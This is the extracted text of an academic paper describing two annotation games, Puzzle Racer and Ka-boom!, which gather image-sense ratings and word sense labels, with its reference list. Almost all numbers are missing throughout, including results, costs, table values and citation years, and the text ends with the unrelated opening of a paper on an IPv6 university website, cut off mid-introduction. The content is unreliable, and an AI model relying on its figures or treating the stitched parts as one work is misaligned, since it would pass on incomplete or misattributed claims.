upon first moving their racer on one of the gate’s images, the player receives visual and audi- tory feedback based on the type of gate. in the case of a golden gate, the borders around all pic- tures change colors showing which picture should have been selected, a feedback icon appears on the chosen picture (shown in figure c), and an appro- priate sound effect plays. for mystery gates, borders become blue, indicating the gate has no effect. finally, when the race ends, players are asked to solve the race’s puzzle by entering a single word that describes the race’s puzzle theme. for example, in the race shown in figure , an answer of “paper” would solve the puzzle. correctly answering the puzzle doubles the points accumulated by the player during the race. the initial question motivates play- ers to pay attention to picture content shown during the race; the longer the player stays alive, the more clues they can observe to help solve the puzzle. annotation image-sense annotation takes place by means of the puzzle gates. each race’s puzzle theme is based on a specific wordnet sense. ini- tially, each sense is associated with a small set of gold standard images, g, and a much larger set of potentially-associated images, u, whose quality is unknown. at the start of a race, three gold stan- dard images are randomly selected from g to serve as puzzle clues. the details of gold standard image selection are described later in sec. . . we note that not all gold standard images are shown initially as puzzle clues, helping mask potential differences between golden and mystery gates. mystery gates annotate the images in u. the im- ages in a mystery gate are chosen by selecting the least-rated image in u and then pairing it with n- random images from u, where n is the number of pictures shown per gate. by always including the least-rated image, we guarantee that, given sufficient plays, all images for a sense will eventually be rated. when a player chooses an image in the mystery gate, that image receives n- positive votes for it being a good depiction of the sense; the remaining unse- lected images receive one negative vote. thus, an image’s rating is the cumulative sum of the positive and negative votes it receives. this rating scheme is zero-sum so image ratings cannot become inflated such that all images have a positive rating. how- ever, we do note that if u includes many related im- ages, due to the voting, some good images may have (a) puzzle clues (b) a puzzle gate prior to activation (c) an activated puzzle gate figure : screenshots of the key elements of the puzzle racer game negative ratings if even-better images become higher ranked. golden gates are used to measure how well a player understands the race’s puzzle concept (i.e., the sense being annotated). the first three puzzle gates in a race are always golden gates. we denote the percentage of golden gates correctly answered thus far as α. after the three initial golden gates are shown, the type of new puzzle gates is metered by α: golden gates are generated with probability . + . ( − α) and mystery gates are generated for the remainder. in essence, accurate players with high α are more likely to be shown mystery gates that annotate pictures from u, whereas completely inaccurate players are prevented from adding new annotations. 
this mechanism adjusts the number of new annotations a player can produce in real- time based on their current accuracy at recogniz- ing the target concept, which is not currently pos- sible in common crowdsourcing platforms. last, we note that puzzle answering also provides labels for the race’s images, data that might prove valu- able for tasks such as image labeling (mensink et al., ) and image caption generation (feng and lapata, ; kulkarni et al., ). additional game elements puzzle racer incor- porates a number of standard game with a purpose design elements (von ahn and dabbish, ), with two notable features: unlockable achievements and a leaderboard. players initially start out with a sin- gle racer and power-up available. players can then unlock new racers and power-ups through various game play actions of varying difficulty, e.g., cor- rectly answering three puzzle questions in a row. this feature proved highly popular and provided an extrinsic motivation for continued playing. sec- ond, players were ranked according to level, which was determined by the number of correct puzzle an- swers, correct golden gates, and their total score. the top-ranking players were shown at the end of every round and via a special screen in-game. a full, live-updated leaderboard was added halfway through the study and proved an important feature for new players to use in competing for the top ranks. extensibility at its core, puzzle racer provides three central annotation-related mechanics: ( ) an initial set of instructions on how players are to inter- act with images, ( ) multiple series of images shown during game play, and ( ) an open-ended question at the end of the game. these mechanics can be easily extended to other types of annotation where players must choose between several concepts shown as op- tions in the puzzle gates. for example, the instruc- tions could show players a phrase such as “a bowl of *” and ask players to race over images of things that might fit the “*” argument in order to obtain se- lectional preference annotations of the phrase (à la flati and navigli ( )); the lemmas or senses as- sociated with the selected images can be aggregated to identify the types of arguments preferred by play- ers for the game’s provided phrase. similarly, the in- structions could be changed to provide a set of key- words or phrases (instead of images associated with a sense) and ask players to navigate over images of the words in order to perform image labeling. nouns argument, arm, atmosphere, bank, difficulty, disc, interest, paper, party, shelter verbs activate, add, climb, eat, encounter expect, rule, smell, suspend, win adjectives different, important, simple table : lemmas for puzzle racer and ka-boom! . image data puzzle racer requires sets of images g and u as in- put. both were constructed using image queries via the yahoo! boss api as follows. three annotators were asked to each produce three queries for each sense of a target word and, for each query, to se- lect three images as gold standard images. queries were checked for uniqueness and to ensure that at least a few of its image results were related to the sense. each query was used to retrieve one result set of images. two additional annotators then vali- dated the queries and gold standard images produced by the first three annotators. validation ensured that each sense had at least three queries and |g| ≥ for all senses. 
after validation, the gold standard im- ages were added to g and all non-gold images in the result set were added to u, discarding duplicates. during game play, puzzle clues are sampled across queries, rather than sampling directly from g. query-based sampling ensures that players are not biased towards images for a single visual repre- sentation of the sense. while the construction of g and u is manual, we note that alternate methods of constructing the sets could be considered, including automatic ap- proaches such as those used by imagenet (deng et al., ). however, as the focus of this game is on ranking images, a manual process was used to en- sure high-quality images in g. importantly, we stress that the images in g alone are often insufficient due to two reasons. first, most senses – especially those denoting abstract concepts – can be depicted in many ways. relying on a small set of images for a sense can omit common visual- izations, which may limit downstream applications that require general representations. second, many games rely on a sense of novelty, i.e., not seeing the same pictures repeatedly; however, limiting the im- ages to those in g can create issues where too few disc n: a flat circular plate circular plate dish plate plate paper n: a daily or weekly publication on folded sheets news paper daily newspaper newspaper headline simple a: elementary, simple, uncomplicated simple problem + = elementary equation win v: be the winner in a contest or competition olympic winner lottery winner world cup victory table : examples of queries used to gather images images exist to keep player interest high. while ad- ditional manual annotation could be used to select more gold standard images, such a process is time- intensive; hence, one of our game’s purposes is to eventually move high-quality images from u to g. puzzle racer annotation analysis puzzle racer is intended to produce a sense-image mapping comparable to what would be produced by crowdsourcing. therefore, we performed a large- scale study involving over players and , images. two experiments were performed. first, we directly compared the quality of the game-based an- notations with those of crowdsourcing. second, we compared the difference in quality between expert- based gold standard images and the highest-ranked images rated by players. . experimental setup to test the potential of our approach, we selected a range of polysemous noun, verb, and adjec- tive lemmas, shown in table . lemmas had - senses each, for a total of senses. many lemmas have both abstract and concrete senses and some are known to have highly-related senses (erk and mc- carthy, ). hence, given their potential annota- tion difficulty, we view performance on these lem- mas as a lower bound. for all lemmas, during the image generation pro- cess (sec. . ) annotators were able to produce queries for all but one sense, expect v; this produced gold images in g and , unrated images the sense expect v has the definition, “consider obligatory; request and expect.” annotators were able to formulate many queries that could have potentially shown images of this defi- nition, but the images results of such queries were consistently unrelated to the meaning. 
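a sketch of how the image sets and puzzle clues described in this section can be organized: each sense keeps its validated queries, g is the union of the expert-chosen gold images, u is everything else returned by the queries with duplicates dropped, and clues are sampled one per query so that no single visual interpretation of the sense dominates. the data shapes and names are illustrative, not the authors' code.

```python
import random


def build_image_sets(query_results: dict, gold: dict):
    # query_results / gold: query string -> list of image ids (gold has 3 per query)
    g = {img for imgs in gold.values() for img in imgs}
    u = {img for imgs in query_results.values() for img in imgs} - g
    return g, u


def sample_puzzle_clues(gold: dict, k: int = 3):
    # pick the k clues from k different queries rather than straight from g
    queries = random.sample(list(gold), k)
    return [random.choice(gold[q]) for q in queries]


g, u = build_image_sets({"flat circular plate": ["i1", "i2", "i3", "i4"]},
                        {"flat circular plate": ["i1", "i2", "i3"]})
print(sorted(u))    # -> ['i4']
```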
interest n: a sense of concern with and curiosity about someone or something eat v: take in solid food different a: unlike in nature or quality or form or degree party n: a group of people gathered to- gether for pleasure expect v: be pregnant with shelter n: temporary housing for home- less or displaced persons table : examples of gold standard images in u. tables and show examples of the queries and gold standard images, respectively. the game play study was conducted over two weeks using a pool of undergraduate students, who were allowed to recruit other students. after an email announcement, players participated. players were ranked according to their character’s level and provided with an incentive that the four top-ranking players at the end of the study would be provided with gift cards ranging from $ - usd, with a total compensation of $ usd. . experiment : crowdsourcing comparison the first experiment directly compares the image rankings produced by the game with those from an analogous crowdsourcing task. tasks were created on the crowdflower platform using the identical set of examples and annotation questions encoun- tered by players. in each task, workers were shown three example gold standard images (sampled from those configurations seen by players) and asked to identify the common theme among the three exam- ples. then, five annotation questions were shown in which workers were asked to choose which of three images was most related to the theme. ques- tions were created after the puzzle racer study fin- ished in order to use the identical set of questions seen by players as mystery gates. workers were paid $ . usd per task. to compare the quality of the puzzle racer image rankings with those from crowdflower, the three highest-rated images of each sense from both rank- ings were compared. two annotators were shown a sense’s definition and example uses, and then asked to compare the quality of three image pairs, select- ing whether (a) the left image was a better depic- tion of the sense, (b) the right image was better, or (c) the images were approximately equal in quality. in the case of disagreements, a third annotator was asked to compare the images; the majority answer was used when present or, in the case of all three ratings, images were treated as equal, the latter of which occurred for only % of the questions. for all questions, the method used to rank the image was hidden and the order in which images appeared was randomized. results during the study period, players com- pleted races, generating , ratings across , images. ratings were balanced across senses, with a minimum and maximum of and ratings per sense. players accurately identi- fied each race’s theme, selecting the correct image in % of all golden puzzle gates shown. table shows example top-rated images from puzzle racer. experiment measures differences in the qual- ity of the three top-ranked images produced by puz- zle racer and crowdflower for each sense. puzzle racer and crowdflower produced similar ratings, with at least one image appearing in the top-three positions of both ranks for % of the senses. both annotators agreed in % of cases in select- ing the best sense depiction, finding that in % of the agreed cases both images were approximately equal representations of the sense. 
in the remain- ing, the puzzle racer image was better in % and activate v: aerate (sewage) so as to favor the growth of organisms that decompose organic matter argument n: a contentious speech act; a dispute where there is strong disagree- ment atmosphere n: the weather or climate at some place climb v: go upward with gradual or con- tinuous progress important a: of great significance or value rule v: decide with authority table : examples of the three highest-rated images for six senses crowdflower image better in %. when resolu- tions from a third annotator were included, a similar trend emerges: both images were equivalent in % of all cases, puzzle racer images were preferred in % and crowflower images in %. these results show that, as a video game, puzzle racer produces very similar results to what would be expected under equivalent conditions with crowdsourcing. . experiment : image quality the second experiment evaluates the ability of the games to produce high-quality images by measur- ing the difference in quality between gold stan- dard images and top-rated images in the game. crowdflower workers were shown a question with a sense’s definition and example uses and then asked to choose which of two images was a better visual representation of the gloss. questions were created for each of the three highest-rated images for each sense, pairing each with a randomly-selected gold standard image for that sense. image order was ran- domized between questions. five questions were shown per task and workers were paid $ . usd per task. the worker responses were aggre- gated by selecting each question’s most frequent an- swer. results for senses within each part of speech, workers preferred the gold standard image to the workers were paid more for the second task to adjust for the time required to read each question’s sense definition and example uses; thus, hourly compensation rates in the two ex- periments were approximately equivalent. top-rated image for nouns, verbs, and adjectives . %, . %, and . % of the time, respectively. this preference is not significant at p < . , indi- cating that the top-ranked images produced through puzzle racer game play are approximately equiva- lent in quality to images manually chosen by experts with full knowledge of the sense inventory. . cost comparison puzzle racer annotations cost $ , or $ . usd per rating. in comparison, the analogous crowd- flower annotations cost $ . , or $ . usd per annotation. because the game’s costs are fixed, the cost per annotation is driven down as players compete. as a result, puzzle racer reduces the an- notation cost to ≤ % of that required by crowd- sourcing. we note that other factors could have con- tributed to the cost reduction over crowdsourcing be- yond the video game itself. however, as we demon- strate in vannella et al. ( ), players will play a video game with a purpose without compensation just as much as they do when compensated using a similar setup as was performed in this experiment. hence, the video game itself is likely the largest mo- tivating factor for the cost reduction. video game-based annotation does come with in- direct costs due to game development. for example, poesio et al. ( ) report spending £ , over a two-year period to develop their linguistic game with a purpose. in contrast, puzzle racer was cre- ated using open source software in just over a month and developed in the context of a java programming class, removing any professional development costs. 
furthermore, puzzle racer is easily extensible for other text-image annotation tasks, enabling the plat- form to be re-used with minimal effort. the decreased cost does come with an increase in the time per annotation. all tasks on the crowd- flower platform required only a few hours to com- plete, whereas the puzzle racer data was gathered over the two-week contest period. the difference in collection time reflects an important difference in the current resources: while crowdsourcing has established platforms with on-demand workers, no central platforms exist for games with a purpose with an analogous pool of game players. however, although the current games were released in a lim- ited fashion, later game releases to larger venues such as facebook may attract more players and sig- nificantly decrease both collection times and overall annotation cost. game : ka-boom! building large-scale sense-annotated corpora is a long-standing objective (see (pilehvar and navigli, )) and has sparked significant interest in de- veloping effective crowdsourcing annotation and gwap strategies (cf. sec. ). therefore, we pro- pose a second video game, ka-boom!, that produces sense annotations from game play. a live demon- stration of the game is available online. design and game play ka-boom! is an action game in the style of the popular fruit ninja game: pictures are tossed on screen from the boundaries of the screen, which the player must then selectively destroy in order to score points. the game’s chal- lenge stems from rapidly identifying which pictures should be destroyed or not destroyed as they appear. prior to the start of a round, players are shown a sentence with a word in bold (fig. a) and asked to envision pictures related to that word’s meaning in the context. players are then instructed to de- stroy pictures that do not remind them of the bolded word’s meaning and let live pictures showing some- thing reminiscent. once finished reading the instruc- tions, players begin a round of game play that shows ( ) images for each sense of the word and ( ) im- ages for unrelated lemmas, referred to as distractor images. http://www.knowledgeforge.org/ players destroy pictures by clicking or touching them, depending on their device’s input (fig. b). players are penalized for failing to destroy the dis- tractor images. rounds begin with a limit of at most three pictures on screen at once, which increases as the round progresses. the additional images pro- vide two important benefits: ( ) an increasing de- gree of challenge to keep the player’s interest, ( ) more image interactions to use in producing the an- notation. additionally, the increasing picture rate enables us to measure the interaction between game play speed and annotation quality in order to help tune the speeds of future games. the round ends when players fail to destroy five or more distrac- tor images or seconds elapses. ending the game early after players fail to destroy distractor images provides ka-boom! a mechanism for limiting the impact of inaccurate or adversarial players on anno- tation quality. after game play finishes, players are shown their score and all the lemma-related pictures they spared (fig. c), proving a positive feedback loop where players can evaluate their choices. annotation traditionally, sense annotation is per- formed by having an annotator examine a word in context and then chose the word’s sense from a list of definitions. ka-boom! replaces the sense defini- tions with image examples of that sense. 
a sense annotation is built from the senses associated with the images that the player spared. images are presented to players based on a sequence of flights. each flight contains one randomly-selected picture for each of a word's n senses and n distractor images. images within a flight are randomly ordered. the structure of a flight's images ensures that, as the game progresses, players see the same number of images for each sense; otherwise, the player's annotation may become biased simply due to one sense's images appearing more often. once the game ends, the senses associated with the spared images are aggregated to produce a sense distribution. for simplicity, the sense with the highest probability is selected as the player's answer; in the case of ties, multiple senses are reported, though we note that the game's annotation method could also produce a weighted distribution over senses (erk et al., ), revealing different meanings that a player considered valid in the context.
[figure : screenshots of the three key elements of the ka-boom! game — (a) the context and target word, (b) players destroying images, (c) the round-over summary.]
the highest probability of a sense from this distribution is then multiplied by the duration of the game to produce the player's score for the round. players maximize their score when they consistently choose images associated with a single sense, which encourages precise game play. the annotation design of having players destroy unrelated images was motivated by two factors. first, the mechanism of destroying unrelated images does not introduce noise into the annotation when a player mistakenly destroys an image; because only retained images count towards the sense annotation, players may be highly selective in which images they retain – even destroying some images that are associated with the correct sense – while still producing a correct annotation. second, our internal testing showed the objective of destroying unrelated pictures keeps players more actively engaged. in the inverse type of play where players destroy only related pictures, players often had to wait for a single picture to destroy, causing them to lose interest. extensibility. ka-boom! contains two core mechanics: ( ) instructions on which pictures should be destroyed and which should be spared, and ( ) the series of images shown to the player during game play. as with puzzle racer, the ka-boom! mechanics can be modified to extend the game to new types of annotation. for example, instructions could display picture examples and ask players to destroy either similar or opposite-meaning ideas in order to annotate synonyms or antonyms. in another setting, images can be associated with semantic frames (e.g., from framenet (baker et al., )) and players must spare images showing the frame of the game's sentence in order to provide frame annotations.
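to make the annotation mechanics concrete, the per-round aggregation and scoring scheme described above can be sketched in a few lines of python; the function, variable names and sense labels below are illustrative and are not taken from the released game code.

```python
from collections import Counter

def kaboom_annotation(spared_senses, game_duration):
    """aggregate the senses of the images a player spared into a sense
    distribution, pick the most probable sense(s), and derive a round score.
    illustrative sketch of the scheme described above, not the game's code."""
    counts = Counter(spared_senses)
    total = sum(counts.values())
    if total == 0:
        return {}, [], 0.0
    dist = {sense: c / total for sense, c in counts.items()}
    best = max(dist.values())
    # ties are kept: several senses may be reported for one round
    answer = sorted(s for s, p in dist.items() if p == best)
    score = best * game_duration  # highest probability multiplied by game duration
    return dist, answer, score

# example with hypothetical sense labels: four spared images of 'rule#v#1', one of 'rule#v#2'
dist, answer, score = kaboom_annotation(['rule#v#1'] * 4 + ['rule#v#2'], game_duration=45.0)
# dist -> {'rule#v#1': 0.8, 'rule#v#2': 0.2}, answer -> ['rule#v#1'], score -> 36.0
```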
ka-boom! annotation analysis. ka-boom! is intended to provide a complementary and more-enjoyable method for sense annotation using only pictures. to test its effectiveness, we perform a direct comparison with the state-of-the-art gwap for sense annotation, wordrobe (venhuizen et al., ), which is not a video game. . experimental setup. organizers of the wordrobe project (venhuizen et al., ) provided a data set of recently-annotated contexts having between one and nine games played for each (mean . games). this data was distinct from the contexts used to evaluate wordrobe in venhuizen et al. ( ), in which case all contexts had six games played each. contexts were for noun and verb lemmas with a total of senses (mean . senses per word). contexts were assigned the most-selected sense label from the wordrobe games. to gather the images for each lemma used with ka-boom!, we repeated a similar image-gathering process as done for the gold standard images in puzzle racer. annotators generated at least three queries for each sense, selecting three images for each query as gold standard examples of the sense. during annotation, four senses could not be associated with any queries that produced high-quality images. in total, images were gathered, with an average of . images per sense. the query data and unrated images are included in the data set, but were not used further in ka-boom! experiments. game players were drawn from a small group of fluent english speakers and were free to recruit other players. a total of players participated. unlike puzzle racer, players were not compensated. each context was seen in at least six games. wsd performance is measured using the traditional precision and recall definitions and the f measure of the two (navigli, ); because all items are annotated, precision and recall are equivalent and we report performance as accuracy. performance is measured relative to two baselines: ( ) a baseline that picks the sense of the lemma that is most frequent in semcor (miller et al., ), denoted as mfs, and ( ) a baseline equivalent to performance if players had randomly clicked on images, denoted as random (this baseline is similar to random sense selection but takes into account differences in the number of pictures per sense). . results. two analyses were performed. because ka-boom! continuously revises the annotation during gameplay based on which pictures players spare, the first analysis assesses how the accuracy changes with respect to the length of one ka-boom! game. the second analysis measures the accuracy with respect to the number of games played per context. in the first analysis, each context's annotation was evaluated using the most-probable sense after each flight of gameplay.
[figure : players' average wsd accuracy within a single game relative to the number of flights seen.]
figure shows results after six games were played. players were highly accurate at playing, surpassing the mfs baseline after seeing two flights of pictures (i.e., two pictures for each sense). accuracy remained approximately equivalent after three rounds for noun lemmas, while verb lemmas showed a small drop-off in performance. we believe that the increased rate at which images occur on screen likely caused lower performance, where players were unable to react quickly enough. many noun lemmas had easily-recognizable associated images, so higher-speed game play may still be accurate. in contrast, verbs were more general (e.g., "decide," "concern," and "include"), which required more abstract thinking in order to recognize an associated picture; as the game speed increased, players were not able to identify these associated pictures as easily, causing slightly decreased performance.
[table : sense disambiguation accuracies for ka-boom!, wordrobe, mfs and random, reported for all lemmas, nouns and verbs.]
table shows the players' disambiguation accuracy after three flights in comparison to the players' accuracy with wordrobe and the two baselines.
ka-boom! provides an increased performance over wordrobe that is statistically significant at p < . ; we note that, although venhuizen et al. ( ) report a higher accuracy for wordrobe in their original experiments ( . f ), that performance was measured on a different data set and used six games per context. ka-boom! also provides a performance increase over the mfs baseline, though it is statistically significant only at p = . . the time required to gather annotations after three flights varied based on the number of senses, but was under a minute in all cases, which puts the rate of annotation on par with that of expert-based annotation (krishnamurthy and nicholls, ). in the second analysis, disambiguation accuracy was measured based on the number of games played for a context. because the provided wordrobe data set has . games played per context on average, results are reported only for the subset of contexts played in at least four wordrobe games in order to obtain consistent performance estimates; in all cases, players played at most one game per context. ka-boom! annotations are recorded after three flights were seen in each game.
[figure : average wsd accuracy as a function of the number of games played for a context.]
figure shows the performance relative to the number of annotators for both ka-boom! and wordrobe, i.e., the number of games played for that context by different players. for nouns, ka-boom! is able to exceed the mfs baseline after only two games are played. for both nouns and verbs, multiple rounds of ka-boom! game play improve performance. in contrast to ka-boom!, wordrobe accuracy declines as the number of players increases; when multiple players disagree on the sense, no clear majority emerges in wordrobe, lowering the accuracy of the resulting annotation. in contrast, a single player in ka-boom! produces multiple sense judgments for a context in a single game via interacting with each flight of images. these interactions provide a robust distributional annotation over senses that can be easily aggregated with other players' judgments to produce a higher-quality single sense annotation. this analysis suggests that ka-boom! can produce accurate annotations with just a few games per context, removing the need for many redundant annotations and improving the overall annotation throughput. conclusion and future work. in this work we have presented a new model of linguistic games with a purpose focused on annotation using video games. our contributions show that designing linguistic annotation tasks as video games can produce high-quality annotations. in the first game, puzzle racer, we demonstrated that game play can produce a high-quality library of images associated with wordnet senses, equivalent to those produced by expert annotators. moreover, puzzle racer reduces the cost of producing an equivalent resource via crowdsourcing by at least % while providing similar-quality image ratings. in the second game, ka-boom!, we demonstrated that a video game could be used to perform accurate word sense annotation with a large improvement over the mfs baseline and a statistically significant improvement over current game-based wsd.
while not all linguistic annotations tasks are eas- ily representable as video games, our two games provide an important starting point for building new types of nlp games with a purpose based on video games mechanics. software for both games will be open-sourced, providing a new resource for future game development and extensions of our work. fur- thermore, the multiple data sets produced by this work are available at http://lcl.uniroma . it/videogames, providing ( ) a sense-image mapping from hundreds of senses to tens of thou- sands of images, ( ) word labels for most images in our dataset, ( ) web queries associated with all senses, and ( ) image-based word sense annotations. based on our results, three directions for future work are planned. the two games presented here focus on concepts that can be represented visually and thus lend themselves to annotations for lexi- cal semantics. however, the fact that the games are graphical does not prevent them from showing textual items (see vannella et al. ( )) and more apt video games could be developed for text-based annotations such as pp-attachment or pronoun res- olution. therefore, in our first future work, we plan to develop new types of video games for tex- tual items as well as extend the current games for new semantic tasks such as selectional preferences and frame annotation. second, we plan to scale up both games to a broader audience such as face- book, creating a larger sense-image library and a standard platform for releasing video games with a purpose. third, we plan to build multilingual games using the images from puzzle racer, which provide a language-independent concept representation, and could therefore be used to enable the annotation and validation of automatically-created knowledge re- sources (hovy et al., ). acknowledgments the authors gratefully acknowl- edge the support of the erc start- ing grant multijedi no. . we thank the many game players whose collective passion for video games made this work possible. references guillaume artignan, mountaz hascoët, and mathieu lafourcade. . multiscale visual analysis of lexi- cal networks. in proceedings of the international con- ference on information visualisation, pages – . ron artstein and massimo poesio. . inter-coder agreement for computational linguistics. computa- tional linguistics, ( ): – . collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet project. in pro- ceedings of the th international conference on computational linguistics and th annual meet- ing of the association for computational linguistics, montréal, québec, canada, – august , mon- treal, canada. kobus barnard, pinar duygulu, david forsyth, nando de freitas, david m. blei, and michael i. jordan. . matching words and pictures. the journal of machine learning research, : – . chris biemann and valerie nygaard. . crowdsourc- ing wordnet. in the th international conference of the global wordnet association (gwc- ). jon chamberlain, karën fort, udo kruschwitz, math- ieu lafourcade, and massimo poesio. . using games to create language resources: successes and limitations of the approach. in iryna gurevych and jungi kim, editors, the people’s web meets nlp, the- ory and applications of natural language processing, pages – . springer. tim chklovski and yolanda gil. . improving the design of intelligent acquisition interfaces for collect- ing world knowledge from web contributors. in pro- ceedings of the international conference on knowl- edge capture, pages – . acm. 
tim chklovski and rada mihalcea. . building a sense tagged corpus with open mind word expert. in proceedings of acl workshop on wsd: re- cent successes and future directions, philadelphia, pa, usa. seth cooper, firas khatib, adrien treuille, janos bar- bero, jeehyung lee, michael beenen, andrew leaver- fay, david baker, zoran popović, and foldit players. . predicting protein structures with a multiplayer online game. nature, ( ): – . jia deng, wei dong, richard socher, li-jia li, kai li, and li fei-fei. . imagenet: a large-scale hier- archical image database. in proceedings of the con- ference on computer vision and pattern recognition (cvpr), pages – . philip edmonds and adam kilgarriff. . introduc- tion to the special issue on evaluating word sense dis- ambiguation systems. natural language engineering, ( ): – . katrin erk and diana mccarthy. . graded word sense assignment. in proceedings of the confer- ence on empirical methods in natural language pro- cessing (emnlp), pages – , singapore. katrin erk, diana mccarthy, and nicholas gaylord. . measuring word meaning in context. computa- tional linguistics, ( ): – . christiane fellbaum, joachim grabowski, and shari lan- des. . performance and confidence in a semantic annotation task. in christiane fellbaum, editor, word- net: an electronic lexical database, pages – . mit press. christiane fellbaum, editor. . wordnet: an elec- tronic database. mit press, cambridge, ma. yansong feng and mirella lapata. . automatic caption generation for news images. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . tiziano flati and roberto navigli. . spred: large- scale harvesting of semantic predicates. in proceed- ings of the st annual meeting of the association for computational linguistics (acl), pages – , sofia, bulgaria. amaç herdağdelen and marco baroni. . bootstrap- ping a game with a purpose for common sense col- lection. acm transactions on intelligent systems and technology, ( ): – . barbora hladká, jiřı́ mı́rovskỳ, and pavel schlesinger. . play the language: play coreference. in pro- ceedings of the joint conference of the association for computational linguistics and international joint conference of the asian federation of natural lan- guage processing (acl-ijcnlp), pages – . as- sociation for computational linguistics. jisup hong and collin f. baker. . how good is the crowd at “real” wsd? in proceedings of the fifth linguistic annotation workshop (law v), pages – . acl. eduard h. hovy, roberto navigli, and simone paolo ponzetto. . collaboratively built semi-structured content and artificial intelligence: the story so far. artificial intelligence, : – . david jurgens. . embracing ambiguity: a compar- ison of annotation methodologies for crowdsourcing word sense labels. in proceedings of the conference of the north american chapter of the association of computational linguistics (naacl), pages – . ramesh krishnamurthy and diane nicholls. . peel- ing an onion: the lexicographer’s experience of man- ual sense-tagging. computers and the humanities, ( - ): – . girish kulkarni, visruth premraj, vicente ordonez, sag- nik dhar, siming li, yejin choi, alexander c. berg, and tamara l. berg. . babytalk: understand- ing and generating simple image descriptions. ieee transactions on pattern analysis and machine intelli- gence, ( ): – . yen-ling kuo, jong-chuan lee, kai-yang chiang, rex wang, edward shen, cheng-wei chan, and jane yung-jen hsu. . 
community-based game de- sign: experiments on social games for commonsense data collection. in proceedings of the acm sigkdd workshop on human computation, pages – . mathieu lafourcade and alain joubert. . comput- ing trees of named word usages from a crowdsourced lexical network. in proceedings of the international multiconference on computer science and informa- tion technology (imcsit), pages – , wisla, poland. tak yeon lee, casey dugan, werner geyer, tristan ratchford, jamie rasmussen, n. sadat shami, and stela lupushor. . experiments on motivational feedback for crowdsourced workers. in seventh in- ternational aaai conference on weblogs and social media (icwsm), pages – . thomas mensink, jakob j. verbeek, and gabriela csurka. . tree-structured crf models for inter- active image labeling. ieee transactions on pattern analysis and machine intelligence, ( ): – . george a. miller, claudia leacock, randee tengi, and ross bunker. . a semantic concordance. in pro- ceedings of the rd darpa workshop on human lan- guage technology, pages – , plainsboro, n.j. roberto navigli and simone paolo ponzetto. . ba- belnet: the automatic construction, evaluation and application of a wide-coverage multilingual semantic network. artificial intelligence, : – . roberto navigli. . word sense disambiguation: a survey. acm computing surveys (csur), ( ): – . martha palmer, hoa dang, and christiane fellbaum. . making fine-grained and coarse-grained sense distinctions, both manually and automatically. natu- ral language engineering, ( ): – . rebecca j. passonneau and bob carpenter. . the benefits of a model of annotation. in th linguistic annotation workshop and interoperability with dis- course, august – . rebecca j. passonneau, vikas bhardwaj, ansaf salleb- aouissi, and nancy ide. . multiplicity and word sense: evaluating and learning from multiply labeled word sense annotations. language resources and evaluation, ( ): – . ei pa pa pe-than, dh-l goh, and chei sian lee. . a survey and typology of human computation games. in information technology: new generations (itng), ninth international conference on, pages – . ieee. mohammad taher pilehvar and roberto navigli. . a large-scale pseudoword-based evaluation frame- work for state-of-the-art word sense disambigua- tion. computational linguistics, ( ). massimo poesio, jon chamberlain, udo kruschwitz, livio robaldo, and luca ducceschi. . phrase de- tectives: utilizing collective intelligence for internet- scale language resource creation. acm transac- tions on interactive intelligent systems, ( ): : – : , april. nitin seemakurty, jonathan chu, luis von ahn, and an- thony tomasic. . word sense disambiguation via human computation. in proceedings of the acm sigkdd workshop on human computation, pages – . acm. rion snow, brendan o’connor, daniel jurafsky, and andrew ng. . cheap and fast – but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, waikiki, honolulu, hawaii, - october, pages – . antonio torralba, robert fergus, and william t free- man. . million tiny images: a large data set for nonparametric object and scene recognition. ieee transactions on pattern analysis and machine intelli- gence, ( ): – . daniele vannella, david jurgens, daniele scarfini, domenico toscani, and roberto navigli. . vali- dating and extending semantic knowledge bases using video games with a purpose. 
in proceedings of the nd annual meeting of the association for computa- tional linguistics (acl), pages – . noortje j. venhuizen, valerio basile, kilian evang, and johan bos. . gamification for word sense label- ing. in proceedings of the international conference on computational semantics (iwcs), pages – . luis von ahn and laura dabbish. . labeling im- ages with a computer game. in proceedings of the conference on human factors in computing systems (chi), pages – . luis von ahn and laura dabbish. . designing games with a purpose. communications of the acm, ( ): – . aobo wang, cong duy vu hoang, and min-yen kan. . perspectives on crowdsourcing annotations for natural language processing. language resources and evaluation, ( ): – . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) design of university resource website and security measures in ipv chunmei li department of computer technology and application, qinghai university xining, china e-mail: chunmeili@xyz.com peng cui department of computer technology and application, qinghai university xining, china e-mail: pengcu@xyz.com xinke zhou department of computer technology and application, qinghai university xining, china e-mail: xinkezhou@xyz.com ze xiao department of computer technology and application, qinghai university xining, china e-mail: zexiao@xyz.com abstract—in this paper authors introduced the overall design of learning resource sharing platform in the pure ipv environment, including the client and the web server and the back-end database, and the user management, the detailed design of the three aspects of resource management platform and administrator management. finally authors introduced application of decision tree in this website. keywords-ipv ; address binding; decision tree i. introduction with the development of computer technology, people's work style, lifestyle changes, the increasing demand for computer networks, and the rapid increase in the number of internet users, making the urgent increase in ipv address requirements. the existing ipv address has long been unable to meet the demand. after the depletion of ipv address in asian, latin america, europe and the united states and other regions , on september , , north america also declared ipv address were exhausted, leaving only a small amount of the african region [ ]. in order to maintain the use of ipv addresses, there are technologies such as nat[ ] (network address translation) technology, vlsm (variable long subnet mask) technology[ ], cidr[ ] (no class interdomain routing) which can not solve the fundamental problem of ipv address depletion. so the technology translates from ipv to ipv and ipv environment in a variety of applications have been carried out in the world research, japan and other countries in the study of ipv new technology has been at the forefront of the world. ipv address is bits, which can represent the great address space, good scalability, better quality of service (qos), security、 mobility and improve the efficiency of routing and other characteristics [ ]. china has started the next generation of internet demonstration project (cngi) project in , one of the countries with relatively advanced global start and multiple ipv addresses, but the use of ipv addresses is far behind, the conversion of ipv and ipv uses three techniques, namely, dual-station protocol technology[ ], tunneling technology[ ][ ] and translation technology (also called protocol conversion technology)[ ]. 
